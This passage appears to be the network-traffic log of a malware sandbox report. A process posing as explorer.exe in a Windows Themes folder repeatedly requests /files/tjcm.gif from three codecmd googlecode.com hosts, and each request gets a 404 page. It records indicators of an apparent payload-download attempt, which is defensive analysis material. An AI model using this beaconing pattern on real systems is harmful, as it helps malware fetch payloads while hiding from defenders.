                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:38.727787971 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.651166172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:40.121731043 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:40.677341938 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:40 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:40.677391052 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.651167108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:42.306715965 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:42.994503975 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:42 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:42.994533062 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.651168142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:44.141674995 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:44.943521023 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:44 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:44.943541050 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.651169172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:46.001137018 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:46.566046000 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:46 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:46.566087961 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.651170108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:47.560627937 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:48.241724014 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:48 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:48.241750002 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.651171142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:49.178781986 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:49.931474924 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:49 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:49.931512117 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.651172172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:50.987627029 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:51.494869947 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:51 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:51.494983912 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
